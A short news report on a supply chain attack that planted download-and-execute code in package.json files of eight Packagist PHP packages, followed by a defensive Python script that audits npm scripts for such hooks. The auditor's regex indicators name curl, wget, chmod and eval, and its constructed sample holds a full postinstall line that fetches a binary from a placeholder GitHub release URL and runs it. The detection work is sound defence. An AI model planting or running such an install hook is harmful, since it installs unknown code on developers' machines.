Packagist Supply Chain Attack Infects 8 Packages Using GitHub-Hosted Linux Malware
A coordinated supply chain attack campaign has impacted eight packages on Packagist, the main repository for PHP Composer packages. According to security firm Socket, the malicious code was not placed in composer.json, where one would expect it, but inserted into package.json, targeting projects that ship JavaScript alongside PHP. The malware downloads and executes a Linux binary hosted on a GitHub Releases URL. The attack was discovered on May 23, 2026, and the affected packages have since been removed or updated. This incident underscores the growing sophistication of supply chain attacks, in which attackers exploit cross-platform dependencies to evade detection. Developers are advised to audit their package.json files for unexpected entries and verify the integrity of their dependencies.
PHP developers must now check package.json for malicious code, expanding the attack surface beyond composer.json.
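As an added example (not code from Socket or from any of the affected packages), the following Python auditor walks a Composer vendor/ tree and flags package.json scripts that fetch a remote binary and run it. It assumes the injected code sat in npm script entries such as postinstall, which the report above does not specify; the indicator patterns, hook list and sample package.json are constructed for illustration.

```python
import json
import re
from pathlib import Path

# npm runs these script keys automatically during install (npm lifecycle hooks).
AUTO_RUN_HOOKS = {"preinstall", "install", "postinstall", "prepare"}

# Heuristics for "download a binary and execute it" (assumed indicators, not from the advisory).
INDICATORS = {
    "remote-fetch": re.compile(r"\b(curl|wget)\b"),
    "github-release-url": re.compile(r"github\.com/\S+/releases/download/", re.I),
    "make-executable": re.compile(r"chmod\s+(\+x|[0-7]{3,4})"),
    "inline-eval": re.compile(r"\b(node\s+-e|eval|base64\s+(-d|--decode))\b"),
}

def audit_package_json(text):
    """Return (script_name, indicator, runs_automatically) tuples for one package.json body."""
    try:
        data = json.loads(text)
    except json.JSONDecodeError:
        return [("<file>", "invalid-json", False)]
    findings = []
    for name, cmd in (data.get("scripts") or {}).items():
        if not isinstance(cmd, str):
            continue
        for label, pattern in INDICATORS.items():
            if pattern.search(cmd):
                findings.append((name, label, name in AUTO_RUN_HOOKS))
    return findings

def audit_vendor_tree(root):
    """Audit every package.json below a Composer vendor/ directory; map path -> findings."""
    report = {}
    for path in Path(root).rglob("package.json"):
        hits = audit_package_json(path.read_text(encoding="utf-8", errors="replace"))
        if hits:
            report[str(path)] = hits
    return report
# Constructed sample: a benign build script next to an injected postinstall hook (placeholder URL).
SAMPLE = json.dumps({
    "name": "example-widget",
    "scripts": {
        "build": "vite build",
        "postinstall": "curl -sL https://github.com/example-org/example/releases/download/v1/agent -o /tmp/agent && chmod +x /tmp/agent && /tmp/agent",
    },
})
if __name__ == "__main__":
    for script, label, auto in audit_package_json(SAMPLE):
        print(f"{script}: {label}{' (runs automatically on install)' if auto else ''}")
```

Run it as `python audit.py` for the sample, or call `audit_vendor_tree("vendor")` from a CI step to fail the build on any finding in an auto-run hook.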